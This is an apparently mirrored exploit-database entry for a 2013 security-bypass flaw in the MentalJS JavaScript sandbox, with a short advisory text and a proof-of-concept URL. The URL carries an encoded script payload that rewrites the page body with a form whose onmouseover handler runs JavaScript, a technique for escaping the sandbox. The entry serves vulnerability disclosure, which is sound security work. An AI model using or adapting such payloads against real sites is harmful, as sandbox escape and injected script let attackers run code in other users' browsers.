MentalJS – Sandbox Security Bypass

  • 作者: Rafay Baloch
    日期: 2013-09-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38770/
  • source: https://www.securityfocus.com/bid/62581/info
    
    MentalJS is prone to a security-bypass vulnerability.
    
    An attacker can exploit this issue to bypass sandbox security restrictions and perform unauthorized actions; this may aid in launching further attacks. 
    
    http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E